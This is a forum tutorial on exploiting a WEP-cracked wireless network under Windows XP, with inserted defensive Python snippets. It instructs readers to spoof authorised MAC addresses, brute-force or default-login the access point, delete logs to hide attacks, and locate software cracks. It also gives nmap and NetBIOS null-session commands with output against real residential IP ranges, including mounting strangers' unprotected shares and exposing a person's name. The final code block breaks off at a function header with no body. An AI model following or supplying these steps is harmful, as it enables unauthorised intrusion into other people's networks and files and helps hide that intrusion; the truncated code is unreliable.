TheTAZZone - Internet Chaos

Tutorial – Cracking WEP with Windows XP part 2

ORIGINALLY POSTED BY NOKIA FOR THETAZZONE/TAZFORUM HERE

Do not use, republish, in whole or in part, without the consent of the Author. TheTAZZone policy is that Authors retain the rights to the work they submit and/or post…we do not sell, publish, transmit, or have the right to give permission for such…TheTAZZone merely retains the right to use, retain, and publish submitted work within its Network

[size=150][u][b]Cracking WEP with Windows XP SP2 – Part Two[/b][/u][/size]


Part Two in the Cracking WEP series covers what to do once you have a valid WEP key – I recommend you read Part One (if you have not already) before reading this tutorial if you want to understand how WEP works and how to get the WEP key. It can be found here: http://www.tazforum.thetazzone.com/viewtopic.php?t=2069

So, you have managed to get a valid WEP key, and are wondering what to do next?

Well, first of all, you should try to associate with the Wireless Access Point (WAP or AP). This is made very easy in Windows XP SP2:

[b][u]When SSID Broadcasting is enabled:[/u][/b]
Start > Connect to > Wireless Network Connection > View Available Wireless Networks

You will now be presented with a list of wireless networks that Windows XP has managed to find. If SSID broadcasting is enabled on the AP, the network name will show up, and the application will also let you know if the AP is using WPA encryption or not.

If it shows the network name and then ‘Security enabled wireless network’ beneath it, there is a 90% chance that it will be using WEP for its security. If it is using WPA, it will say “Security Enabled Network (WPA)”.

Now just double click on the network name and it will prompt you to enter the WEP key – enter this twice and see if it lets you connect.

If it does, well done, you have successfully associated with the AP – if it does not, the following are the most likely possible causes of this:

– The AP has MAC Address filtering enabled;
– You are too far away from the AP;
– The WEP key is wrong.

[b]The AP has MAC address filtering enabled[/b]
If you followed my previous paper to obtain the WEP key, I mentioned writing down the MAC addresses that had successfully associated with the AP in case MAC address filtering was active.

Now you know why!

Change your MAC address (covered later on) to one that you know was associated and therefore authenticated to that AP. Then, wait until it is not in use – the early hours of the morning are usually good for this – change your MAC Address, and try to associate with the AP. You can try it whilst the rightful owner of the MAC is online, but you will either kick him off or be rejected by the AP.

[b]You are too far away from the AP[/b]
– Move closer to it;
– Wait until night time – wireless waves travel further at night, especially if it has been raining (the more humid, the better);
– Get an external and more powerful antenna, or a directional antenna (these are much more powerful than omnidirectional antennae);
– Try another wireless card;
– Sometimes moving rooms in your house can solve the issue – I pick up APs in one room in the front of my house that I don’t in a room at the back of my house;
– Move into the garden – there are no walls or electrical interference in the garden!

[b]The WEP key is wrong[/b]
This may sound obvious but I have had students do this in the past… Make sure that the WEP key you have managed to obtain is for the same AP to which you are trying to connect!
Check that you are entering it correctly – it is in HEX, so the 0 is a ZERO, [b]not[/b] a capital ‘O’ – there is no ‘O’ in HEX – I have seen this before too!

[b][u]If SSID broadcasting is disabled:[/u][/b]
If SSID broadcasting is disabled, and if you have not managed to find it with Airodump, you will have to fire Airodump back up and let it collect data again (use your IVS file and just add data to this) until it finds the SSID – it will find it, given enough data. There are other applications that will do this on various operating systems, but I am using Airodump here.

Once you have the ESSID (the name of the wireless network), you need to tell Windows what AP you would like it to connect to. You do this like so:

Start > Connect to > Wireless Network Connection > View Wireless Networks > Change Advanced settings (on the left) > Wireless Networks (Middle tab on top) > Add (under preferred networks) > Type the SSID exactly as Airodump has displayed it to you into the “SSID” box > Network Authentication is usually OPEN > Select WEP from the Data Encryption > Uncheck ‘The Key is provided for me automatically’ box if it is ticked > Then enter the WEP key into the relevant boxes, without the colons.

If you wish, you can go to the last tab (Connection) and check the box to ‘Automatically connect when network is in range’. This will automatically connect you to this network when Windows picks it up; this setting is usually enabled by default.

The other settings will differ by AP but are usually left unchecked.

[b][u]Changing your MAC address:[/u][/b]
For some people, this can seem a bit daunting and/or a complex task to do. This would have been true a few years ago, but nowadays there are hundreds of applications which can do this for you, and with Windows XP SP2 it can even be done using the inbuilt network configuration tools.

First, let me very briefly explain what a Media Access Control (MAC) address is and why it is so important on a network.

All Network Interface Cards (NICs) have a unique set of numbers and letters encoded into the hardware when they are made in the factory. Theoretically, every single NIC in the world has a different MAC address. It is encoded using the HEX numbering system – that is, the decimal digits (numbers from 0-9) and the letters A-F (the same HEX that a WEP key uses).

It will look something like this: 00:09:5B:84:A6:DF

Each manufacturer has a different OUI (Organisationally Unique Identifier) at the beginning of the MAC address, but that is not important to us here.

When you try to associate with an AP, your MAC address is included in the header of the frame (data) that you are sending. The AP will check this against a local database to see if you are allowed to associate with it or not. If you are not, obviously you will not be allowed to associate, so you will need to spoof your own MAC address. Be aware that you will cause a duplicate entry in the AP’s ARP cache if you try to use the MAC address of a host that is already associated with the AP. It may be wise to wait until a quiet period – usually at night – before doing this.
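
As an added example (not part of Nokia’s tutorial) of what the MAC format above means from the defender’s side: the first octet carries the IEEE locally-administered bit, which is the bit the Device Manager field called “Locally administered address” sets, and a gateway or AP ARP table in which one MAC is bound to two IPs is the duplicate-entry symptom just described. The `arp -a` style input below is constructed, not a real capture.

```python
import re
from collections import defaultdict

# Accepts 00:09:5B:84:A6:DF, 00-09-5B-84-A6-DF or 00095B84A6DF (the 12-digit
# form the registry NetworkAddress value uses).
_MAC_RE = re.compile(r"^([0-9A-Fa-f]{2})([-:]?)(?:[0-9A-Fa-f]{2}\2){4}[0-9A-Fa-f]{2}$")
# One data row of Windows "arp -a" output: IP, whitespace, dashed or colon MAC.
_ARP_ROW_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9A-Fa-f]{2}(?:[-:][0-9A-Fa-f]{2}){5})")


def is_valid_mac(mac: str) -> bool:
    """True only for 12 hex digits with a consistent (or no) separator; a letter O fails."""
    return _MAC_RE.match(mac.strip()) is not None


def normalise_mac(mac: str) -> str:
    """Return the address as 12 upper-case hex digits, or raise ValueError."""
    m = mac.strip()
    if not _MAC_RE.match(m):
        raise ValueError(f"not a valid MAC address: {mac!r}")
    return re.sub(r"[-:]", "", m).upper()


def describe_mac(mac: str) -> dict:
    """Split a MAC into its OUI and the two flag bits carried in the first octet."""
    h = normalise_mac(mac)
    first_octet = int(h[:2], 16)
    return {
        "mac": ":".join(h[i:i + 2] for i in range(0, 12, 2)),
        "oui": h[:6],  # manufacturer prefix (Organisationally Unique Identifier)
        # IEEE 802 U/L bit (0x02): set on addresses chosen by software rather
        # than burnt in at the factory, i.e. a "locally administered address".
        "locally_administered": bool(first_octet & 0x02),
        # I/G bit (0x01): a unicast station address must have this clear.
        "multicast": bool(first_octet & 0x01),
    }


def audit_arp_table(arp_output: str) -> dict:
    """Flag MACs bound to more than one IP, and MACs that carry the U/L bit."""
    ip_by_mac = defaultdict(set)
    for line in arp_output.splitlines():
        m = _ARP_ROW_RE.search(line)
        if m:
            ip_by_mac[normalise_mac(m.group(2))].add(m.group(1))
    duplicates = {mac: sorted(ips) for mac, ips in ip_by_mac.items() if len(ips) > 1}
    laa = sorted(mac for mac in ip_by_mac if describe_mac(mac)["locally_administered"])
    return {"duplicates": duplicates, "locally_administered": laa}


# Constructed sample in the layout of Windows "arp -a" output; not a real capture.
SAMPLE_ARP = """\
Interface: 192.168.2.1 --- 0x2
  Internet Address      Physical Address      Type
  192.168.2.4           00-09-5b-84-a6-df     dynamic
  192.168.2.7           00-09-5b-84-a6-df     dynamic
  192.168.2.5           02-11-22-33-44-55     dynamic
"""

if __name__ == "__main__":
    print(describe_mac("00:09:5B:84:A6:DF"))
    print(audit_arp_table(SAMPLE_ARP))
```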

I don’t want to go into too much detail here about this process, but if you do want to learn more about it and how it can be exploited on a network, you can read other papers that I have written here:
http://tazforum.thetazzone.com/viewtopic.php?t=473
http://tazforum.thetazzone.com/viewtopic.php?t=530

To change a MAC address, I like to use AMAC: http://amac.paqtool.com/

You can download a trial version of it from the link above, and the more resourceful of you will be able to find a crack to unlock the full version of it.

The program is very user-friendly, and there is no need for me to explain how to use it. But, if you do have any issue with changing your MAC address with it, post in this thread and someone will try to help you (DO NOT post asking where to get the crack).

To change your MAC address using Windows’ inbuilt tools, you must use the Windows Device Manager (this is not possible on ALL wireless adaptors, especially in-built ones). Here are instructions on how to do this:

Control Panel > System > Hardware > Device manager > Network Adaptors > Select your network adaptor > Advanced > MAC Address / Hardware Address/Locally administered address > Change it to the desired value.

**Make sure you write the original one down so you can change it back**

Or you can do it via the registry:

1. Open up a command prompt and type “ipconfig /all”, write down the Description for the NIC you want to change and also the MAC address you want to change.

2. Open up a command prompt and type “net config rdr”

3. Write down the long number between the curly braces { }. This is the GUID of the NIC – you may have more than one; if so, write them all down or copy and paste them into a text file for reference later on.

4. Start -> Run, type “regedt32”. Do not use Regedit.

5. If you so wish you can back your registry up in case you inadvertently mess it up – the registry is vital to how Windows operates, and incorrectly changing a setting could render your computer unusable.
To back it up, either right click on the root of the key we are editing (in this case, it is HKEY_LOCAL_MACHINE) and select Export – call it something appropriate and save it somewhere (like My Documents). Or, if you want to back up the whole registry, right click on My Computer > Export – this will export the entire registry.

6. Go to “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}”. Double click on it to expand the tree. The sub-keys are 4-digit numbers, which represent a whole range of different hardware. You should see most of them start with 0000, then 0001, 0002, 0003 and so on.

7. Go through each sub-key, starting with 0000, and check the DriverDesc value on the right until you see the NIC you want to change the MAC address on. The DriverDesc will be the same as what your NIC was called in the Device Manager. If you are not sure about the DriverDesc, you can verify it by checking whether the NetCfgInstanceID value matches the GUID you wrote down in step 3.
If there is no match, then move on to 0001, 0002, 0003, and so on, until you find the one you want. Usually 0000 contains the first NIC you installed on the computer.

8. When you have found and selected the correct sub-key (0000, in my case), check if there is a keyword “NetworkAddress” on the right side of the window.
If the “NetworkAddress” keyword does not exist, we will have to create it, like so:
Click on the drop down menu “Edit -> Add Value”.
In the Add Value window, enter the following value then click OK.
Value Name: = NetworkAddress
Data Type: = REG_SZ
Then the String Editor window will pop up:
Enter the new 12-digit MAC address that we know is allowed to authenticate to the AP > OK.

Close the registry.

To make this MAC address active you need to either disable and then re-enable the NIC or just reboot your system.

So now we have a MAC Address that we know is allowed to associate with the AP, try to re-authenticate.

You should now be able to connect – if not, carry on with the troubleshooting steps mentioned above!

If you’re still unable to authenticate, post in this thread with any error messages and a detailed description of what is going wrong and someone will try to help you out!

I will take it now that you have been able to associate with the AP and are connected OK.

There is no set way to do things from here on, and you can go off and search for a whole range of things you can do to a computer on the same network as you!

But, to get you started, I will give you a few [b]basic[/b] ideas and things you can try.

[b]Administratively connect to the AP[/b]
Open up a command prompt and type IPCONFIG:

Look under the relevant NIC to find your IP address and your Default Gateway:
[code]
Ethernet adapter Wireless Network Connection:

Connection-specific DNS Suffix . : bubbles
IP Address. . . . . . . . . . . . : 192.168.2.4
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.2.1
[/code]
The IP Address and Subnet Mask tell us what subnet we are on – in the example above, I am on the 192.168.2.0 network with a 255.255.255.0 mask. From this, I can determine that the possible range of IPs that could be active is 192.168.2.1 – 192.168.2.254.

We already know that 192.168.2.1 is active and what it is – the default gateway. In this case (and probably in yours too), it is also the IP address of the AP!

So we open up our web browser and type 192.168.2.1 into it, which will take us to the admin login page for the AP.
There’s a 9/10 chance that the make and model of the AP will be displayed for us here – when we have this, pop along to Google and search for ‘default wireless access point passwords’, which will give you thousands of sites that list the default passwords for WAPs (such as this one: http://www.phenoelit.de/dpl/dpl.html). Find the entry for the make and model of the AP and try the login details to see if they work.

If they do not, go and download [url=http://www.hoobie.net/brutus/]Brutus[/url] and try an HTTP brute force attack against it.

Once we have managed to connect to the AP as an administrator, we can see its whole configuration – look for any port forwarding entries to give you an idea of what services may be running behind the AP. You may also be able to see all the DHCP assignments (IP addresses that the AP has given out to hosts). You can also open ports on the AP, should you wish to. Check its logs. Some APs will not allow wireless clients to talk to each other, which will mess up any further testing attempts later on, so you should turn that setting off now. Enter your own, correct MAC address into the MAC address table so that you will be able to connect when other hosts are connected next time. Check the range of IPs to be issued to hosts – if the owner only has two computers he may only have set two IP addresses to be issued, so extend this by one so that you can connect at the same time as the other two hosts.

I would not change the password once you know it, as this will let the owner know that he has been pwned and will just prompt him to hard reset the router and try harder to secure it. If you launch any attacks from the outside, you can also go in and delete the logs here.

[b]Port Scanning[/b]
We know the IP range in use either from the output of the ipconfig command or, if we managed to connect to the AP as an administrator, from the current IP setup we could see there, so we can scan the network to see what hosts are active.

I prefer NMAP for this, but any port scanner will do:

To perform a ping sweep with NMAP we use the -sP switch:
[code]H:\>nmap -sP 192.168.2.0/24[/code]
The 192.168.2.0/24 tells NMAP to ping all hosts between 192.168.2.0 and 192.168.2.255; the /24 is an abbreviated way of telling it the subnet mask, 255.255.255.0.

This may return something similar to this:
[code]
Starting Nmap 4.03 ( http://www.insecure.org/nmap ) at 2006-08-28 16:21 GMT Daylight Time
Host 192.168.2.1 appears to be up.
Host 192.168.2.2 appears to be up.
Host 192.168.2.5 appears to be up.
Nmap finished: 256 IP addresses (3 hosts up) scanned in 68.844 seconds
[/code]
We know what 192.168.2.1 is and now we also know what other hosts are active on the network.

As most of you probably know, you don’t connect to an actual ‘computer’ – you connect to a service that the computer is running. This could be a service that the OS is running, e.g. NetBIOS, or a third-party service, e.g. VNC.

To talk to other computers, most services use ports.

For the most part, a service will use a pre-defined port (by default).

So, if you scan a computer’s ports, you can find out what services are running.

Once you have a list of used ports and services, then research these services to see what they do – if you find one that interests you, research how to exploit this service, so that you can compromise the computer running it.

This is known as port scanning, and the main reason for doing it is to discover what services are running on each host.

**Be careful not to alert anyone on the network with overenthusiastic port scanning. If a host has a firewall active and a message pops up saying ‘Connection attempt from 192.168.2.x port 139’, the owner may be a bit suspicious if the IP is one that should not be in use. Try to use a passive scan such as the -sS switch in NMAP**
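
Added example, not from the original post: the subnet arithmetic from the ipconfig section above done with Python’s ipaddress module, plus the check a network owner would run over firewall pop-up messages of the form just quoted, flagging source IPs that are outside the subnet, outside the DHCP pool or without a current lease, and sources that touch several ports in a row. The log lines, DHCP pool and lease set are constructed for the example.

```python
import ipaddress
import re
from collections import defaultdict

# Wording of the desktop-firewall pop-up quoted above, with a timestamp in front.
_LOG_RE = re.compile(r"Connection attempt from (\d{1,3}(?:\.\d{1,3}){3}) port (\d+)")


def subnet_from_ipconfig(ip: str, mask: str) -> ipaddress.IPv4Network:
    """Combine ipconfig's "IP Address" and "Subnet Mask" lines into the network."""
    return ipaddress.IPv4Network(f"{ip}/{mask}", strict=False)


def usable_range(net: ipaddress.IPv4Network) -> tuple:
    """First and last host address; network and broadcast addresses are excluded."""
    hosts = list(net.hosts())
    return str(hosts[0]), str(hosts[-1])


def flag_connection_attempts(log_text, net, pool_first, pool_last, leases, gateway,
                             scan_threshold=3):
    """Return {source_ip: [reasons]} for sources that should not be there or that probe."""
    lo, hi = ipaddress.IPv4Address(pool_first), ipaddress.IPv4Address(pool_last)
    ports_by_src = defaultdict(set)
    for line in log_text.splitlines():
        m = _LOG_RE.search(line)
        if m:
            ports_by_src[m.group(1)].add(int(m.group(2)))
    findings = {}
    for src, ports in sorted(ports_by_src.items()):
        addr = ipaddress.IPv4Address(src)
        reasons = []
        if addr not in net:
            reasons.append("outside local subnet")
        elif src != gateway and not (lo <= addr <= hi):
            # An address inside the subnet that the router never hands out.
            reasons.append("address not in DHCP pool")
        elif src != gateway and src not in leases:
            # Inside the pool, but no lease is currently recorded for it.
            reasons.append("no current DHCP lease")
        if len(ports) >= scan_threshold:
            reasons.append(f"probed {len(ports)} distinct ports")
        if reasons:
            findings[src] = reasons
    return findings


# Constructed pop-up log for a router that hands out only 192.168.2.2 and .3.
SAMPLE_LOG = """\
2006-08-28 16:21:03 Connection attempt from 192.168.2.2 port 139
2006-08-28 16:21:09 Connection attempt from 192.168.2.9 port 139
2006-08-28 16:21:09 Connection attempt from 192.168.2.9 port 445
2006-08-28 16:21:10 Connection attempt from 192.168.2.9 port 135
2006-08-28 16:21:10 Connection attempt from 192.168.2.9 port 3389
2006-08-28 16:22:41 Connection attempt from 10.0.0.5 port 139
"""
POOL = ("192.168.2.2", "192.168.2.3")          # constructed DHCP pool
LEASES = {"192.168.2.2", "192.168.2.3"}        # constructed current leases
GATEWAY = "192.168.2.1"                        # the AP, as in the ipconfig output


def demo_findings() -> dict:
    """Run the check over the constructed sample, using the ipconfig values above."""
    net = subnet_from_ipconfig("192.168.2.4", "255.255.255.0")
    return flag_connection_attempts(SAMPLE_LOG, net, *POOL, LEASES, GATEWAY)


if __name__ == "__main__":
    net = subnet_from_ipconfig("192.168.2.4", "255.255.255.0")
    print(net, usable_range(net))
    for src, reasons in demo_findings().items():
        print(src, "->", "; ".join(reasons))
```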

[b]NetBIOS[/b]
It is possible to connect to a NetBIOS share that the firewall on the AP may have been protecting – here is an extract from a NetBIOS paper I wrote a few months ago: (Note the IP Addresses will have changed since this was written, and will belong to someone else by now!)
[quote]
After you have downloaded Nmap go and get winfo from here:
http://ntsecurity.nu/toolbox/winfo/

When you have this browse to C:\WINDOWS\system32 and drop the winfo file there. Or you can manually edit your path for the command prompt to include the location of the winfo file.

Now we have nmap we want it to scan a range of IP’s but as we are trying to gain access to the NetBIOS shares, we only need to scan ports 139 and 445. So we issue the following command:
[code]
nmap -sS -P0 81.32.12.0-255 -p139,445
[/code]

Here we have told nmap to conduct a SYN Stealth scan, without pinging the hosts, against the IP range of 81.32.12.0 – 81.32.12.255 only on ports 139 & 445.

Here are the results of the scan:
[code]
Interesting ports on 81.32.12.204:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.205:
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 206.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.207:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.208:
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 222.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 223.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.224:
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.225:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 226.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.227:
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.248:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

**OUTPUT TRUNCATED**

Nmap finished: 256 IP addresses (256 hosts up) …..
[/code]

OK, now looking at the output of the scan, there are three states a port can be in: Closed, Filtered or Open.

Closed speaks for itself, Filtered usually means it is open/active but is protected by a firewall of some kind and Open means it is open and un-protected.

So we trawl through the results and find that 81.32.12.240 has an open port on 139…

So we will go and take a look at it.

Just a side note – we scanned for port 445 too, as it is possible to have port 139 open but not have the file sharing service running – if port 445 is open as well as 139 it usually means that the file sharing service is up and running and could save us some time when choosing which host to attack.

Fire up the command prompt again and use the in-built NBTSTAT utility that comes with Windows. The command we give is:
nbtstat -a [ip address]

Like so:
[code]
H:\>nbtstat -a 81.32.12.240

Local Area Connection:
Node IpAddress: [192.168.2.3] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
———————————————
MASSAMA <00> UNIQUE Registered
MASSAMA <20> UNIQUE Registered
GRUPO_TRABAJO <00> GROUP Registered
GRUPO_TRABAJO <1E> GROUP Registered

MAC Address = 00-53-45-00-00-00
[/code]

So what is all this telling us?

Well, what we are looking at mainly is the ‘TYPE’ status. We want to see <20> there. A common misconception is that if you can connect to a box in the above-mentioned manner, file sharing is enabled. This is not always the case. When we have connected we need to see the <20> there to tell us File Sharing is enabled; if it is not there and you are at a level that means you are reading this, you may as well move on to another box.

The following table lists all the possible entries you can get:
[code]
00 U Workstation Service
01 U Messenger Service
<.._MSBROWSE_> 01 G Master Browser
03 U Messenger Service
06 U RAS Server Service
1F U NetDDE Service
20 U File Server Service
21 U RAS Client Service
22 U Exchange Interchange
23 U Exchange Store
24 U Exchange Directory
30 U Modem Sharing Server Service
31 U Modem Sharing Client Service
43 U SMS Client Remote Control
44 U SMS Admin Remote Control Tool
45 U SMS Client Remote Chat
46 U SMS Client Remote Transfer
4C U DEC Pathworks TCP/IP Service
52 U DEC Pathworks TCP/IP Service
87 U Exchange MTA
6A U Exchange IMC
BE U Network Monitor Agent
BF U Network Monitor Application
03 U Messenger Service
00 G Domain Name
1B U Domain Master Browser
1C G Domain Controllers
1D U Master Browser
1E G Browser Service Elections
1C G Internet Information Server
00 U Internet Information Server
[/code]

As you can see there are many different services that we can connect to. The scope of this paper is File Sharing though, so we will just concentrate on the <20> field.

So, after discovering we can ‘nbtstat’ to another box and we have established that the File Sharing Service is running we want to see what shares are available on a box.

For this we again use an inbuilt command in Windows. The ‘net’ command. Or more specifically the ‘net view’ command.

[code]
H:\>net view \\81.32.12.240
System error 5 has occurred.

Access is denied.
[/code]

Whoops. OK, so this guy is not as open as he first appeared and we can’t get a list of his shares. This may be because he is not running any shares or because he has locked down his box and prevented it from displaying his shares to the casual internet user.

I have put this in to this paper for a few reasons. The first being, if you scour the internet looking for NetBIOS tutorials, you will find hundreds that have been written and performed on an internal LAN, which is conveniently set up to allow anonymous access to the File Sharing service. This paper is using live IP addresses in real life scenarios on the real internet – not a pre-constructed LAN. If you don’t agree with using a real IP scenario, this paper is not for you and you should stop reading it now.

Another reason I left it in is to show that just because you can see the NetBIOS table and it has the <20> File Sharing service running, does not mean you can connect to it!

The final reason is to demonstrate that you will not always be successful with this attack and it can take a lot of trial and error. I have given lessons in the past that have gone on for in excess of 60 minutes before we have found an open and suitable host.

There are ways to gain access to secured shares but that is in the scope of the Advanced NetBIOS paper which will follow this one.

Right, so the last command would not let us get a list of the shares available…..but that does not mean there aren’t any. We can try to connect to the most obvious ones anyway and see what happens.

We stick with the inbuilt ‘net’ command only this time we use the ‘net use’ command.
[code]
H:\>net use \\81.32.12.240\ipc$
The password is invalid for \\81.32.12.240\ipc$.

Enter the user name for ‘81.32.12.240’: administrator
Enter the password for 81.32.12.240:
System error 1326 has occurred.

Logon failure: unknown user name or bad password.
[/code]

OK we don’t know the password…..there are heaps of password crackers for NetBIOS out there – which I consider to be more advanced so will be included in the next paper.

We do have the option of connecting via a ‘null’ session however. A null session does not require a user name or password and will usually allow a connection attempt.
To signify a null connection attempt we use the "" /U:"" switch at the end of our command.

Try the following:
[code]
H:\>net use \\81.32.12.240\ipc$ "" /U:""
The command completed successfully.
[/code]

Now try the ‘net view’ command again to see if we can get a list of the shares. This may or may not be successful, but more often than not it will fail. (If you are successful, read on further down the page to find what to do next!)

Right, so for the scope of our paper the above target will be considered ‘secure’ and we move on to easier pickings……..back to nmap!

I find it easier to either use the -oN switch or to right click on the top of the command prompt window and go to Properties. Once here, increase the buffer size to enable you to scroll upwards in the command prompt – otherwise you may not be able to view the entire output.

The best results for this type of crack are usually found in a residential subnet of IP addresses. How do you find one of those? If you’re at home chances are you are in a residential subnet! Take a look at your own IP and use that. When I ran this scan my IP was in the 86.132.223.x range so I scanned that.
[code]
nmap -sS -P0 -v 86.132.223.0-255 -p 139,445
[/code]

The results for open ports came back as:
[code]
Discovered open port 139/tcp on 86.132.223.96
Discovered open port 139/tcp on 86.132.223.124
Discovered open port 139/tcp on 86.132.223.178
Discovered open port 139/tcp on 86.132.223.227
[/code]

OK, so now we have a whole host of my neighbours to connect to!

Let’s choose an IP!

Hmmmmmm 86.132.223.178 I think!

So open up a command prompt and type:
[code]
H:\>nbtstat -a 86.132.223.178

Local Area Connection:
Node IpAddress: [0.0.0.0] Scope Id: []

Host not found.

Wireless Network Connection 3:
Node IpAddress: [192.168.2.6] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
———————————————
OFFICE <00> UNIQUE Registered
MSHOME <00> GROUP Registered
OFFICE <20> UNIQUE Registered
MSHOME <1E> GROUP Registered

MAC Address = 00-53-45-00-00-00
[/code]

Ok so we now have the NetBIOS table and the MAC address. We take a look to see if the File Sharing Service is active (<20>). Yep it is.

So, now as we know, we issue the net view command to get a list of the shares….

[code]
H:\>net view 86.132.223.178
Shared resources at 86.132.223.178

OFFICE

Share name Type Used as Comment

——————————————————————————-
bramford photos Disk
BrotherD Print Brother DCP-340CW USB Printer
BrotherD.2 Print BRN_759F2E
johns Disk
PaperPor Print PaperPort Black & White Image
PaperPor.2 Print PaperPort Color Image
Printer Print Imprimante Fax Olitec
Printer4 Print ProgeSOFT PDF Wizard
Printer7 Print Net-It Now! SE for Pressworks
Printer9 Print EPSON PictureMate
SharedDocs Disk
SLAVE (D) Disk
The command completed successfully.
[/code]

Look at all those shares.

Now open up a new command prompt and give the following command:
[code]
H:\>winfo 86.132.223.178 -v

Winfo 2.0 – copyright (c) 1999-2003, Arne Vidstrom
– http://www.ntsecurity.nu/toolbox/winfo/

SYSTEM INFORMATION:

– OS version: 5.1

DOMAIN INFORMATION:

– Primary domain (legacy): MSHOME
– Account domain: OFFICE
– Primary domain: MSHOME
– DNS name for primary domain:
– Forest DNS name for primary domain:

PASSWORD POLICY:

Warning: Unable to retrieve password policy.
Reason : Access denied.

LOCOUT POLICY:

Warning: Unable to retrieve lockout policy.
Reason : Access denied.

SESSIONS:

Warning: Unable to retrieve sessions.
Reason : Access denied.

LOGGED IN USERS:

* OFFICE$

* vernon cooper

USER ACCOUNTS:

Warning: Unable to enumerate users.
Reason : Access denied.

WORKSTATION TRUST ACCOUNTS:

Warning: Unable to enumerate workstation trust accounts.
Reason : Access denied.

INTERDOMAIN TRUST ACCOUNTS:

Warning: Unable to enumerate interdomain trust accounts.
Reason : Access denied.

SERVER TRUST ACCOUNTS:

Warning: Unable to enumerate server trust accounts.
Reason : Access denied.

SHARES:

* IPC$

– Type: Unknown
– Remark: Remote IPC

* print$

– Type: Disk drive
– Remark: Printer Drivers

* SharedDocs

– Type: Disk drive
– Remark:

* johns

– Type: Disk drive
– Remark:

* PaperPor.2

– Type: Print queue
– Remark: PaperPort Color Image

* Printer7

– Type: Print queue
– Remark: Net-It Now! SE for Pressworks

* SLAVE (D)

– Type: Disk drive
– Remark:

* Printer4

– Type: Print queue
– Remark: ProgeSOFT PDF Wizard

* PaperPor

– Type: Print queue
– Remark: PaperPort Black & White Image

* BrotherD.2

– Type: Print queue
– Remark: BRN_759F2E

* bramford photos

– Type: Disk drive
– Remark:

* Printer9

– Type: Print queue
– Remark: EPSON PictureMate

* Printer

– Type: Print queue
– Remark: Imprimante Fax Olitec

* BrotherD

– Type: Print queue
– Remark: Brother DCP-340CW USB Printer
[/code]

As you can see winfo gives us all the shares in an easier to read layout. You can put –n at the end of the winfo command to establish a null session if issuing the command without it does not work.

Ok let’s pick a share….mmmm…johns looks good.

Let me explain the following command briefly first though.

“Net use” – means we are going to use a network resource.
The “*” means use the next available drive letter. We normally have C for the hard drive, D for the next logical partition or next hard drive, E for a CD-ROM and maybe even F for another CD-ROM/DVD-ROM etc. Using the * just tells Windows to use the next available letter, starting from Z and working backwards. We can specify our own letter if we want to, but the outcome is the same.
[code]
H:\>net use * \\86.132.223.178\johns
Drive Z: is now connected to \\86.132.223.178\johns.

The command completed successfully.
[/code]

Ok, so John has a share on this computer that is open to the whole world and is not password protected.

How do we see what information is available to us?

Simply go to ‘My Computer’ and you will have a Z drive there already connected and mapped out for you! Click on it and you get to see what is in John’s share.

Let’s try another Share:
[code]
H:\>net use * \\86.132.223.178\SharedDocs
Drive Y: is now connected to \\86.132.223.178\SharedDocs.

The command completed successfully.
[/code]

So go back to My Computer and you will now see the Y: drive connected and mapped out for you.

The other and easier way to do this, is to now go to Start > Search > Computers and add the IP Address in. You will now get a nice graphical view of all the shares.[/quote]
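
Added example (not from the NetBIOS paper quoted above): a parser for the nbtstat name-table layout shown in the extract, decoding suffixes with the table given there, so you can audit your own machines and confirm that hosts which should not be sharing files do not register the <20> File Server Service. The two sample outputs are constructed in the same layout as the quoted ones.

```python
import re

# Suffix meanings for the common entries of the table quoted above; the same
# suffix can mean different things for a UNIQUE (U) and a GROUP (G) name.
SUFFIX_MEANING = {
    ("00", "UNIQUE"): "Workstation Service",
    ("00", "GROUP"): "Domain / Workgroup Name",
    ("03", "UNIQUE"): "Messenger Service",
    ("1B", "UNIQUE"): "Domain Master Browser",
    ("1C", "GROUP"): "Domain Controllers",
    ("1D", "UNIQUE"): "Master Browser",
    ("1E", "GROUP"): "Browser Service Elections",
    ("20", "UNIQUE"): "File Server Service",
}

# One row of the "NetBIOS Remote Machine Name Table": NAME <XX> UNIQUE|GROUP Status
_ROW_RE = re.compile(r"^\s*(\S.*?)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)\s*$")
_MAC_RE = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})")


def parse_nbtstat(output: str) -> dict:
    """Turn "nbtstat -a" output into a list of name-table entries plus the reported MAC."""
    entries, mac = [], None
    for line in output.splitlines():
        m = _ROW_RE.match(line)
        if m:
            name, suffix, ntype, status = m.groups()
            suffix = suffix.upper()
            entries.append({
                "name": name,
                "suffix": suffix,
                "type": ntype,
                "status": status,
                "service": SUFFIX_MEANING.get((suffix, ntype), "unknown suffix"),
            })
            continue
        mm = _MAC_RE.search(line)
        if mm:
            mac = mm.group(1).upper()
    return {"entries": entries, "mac": mac}


def services_advertised(parsed: dict) -> list:
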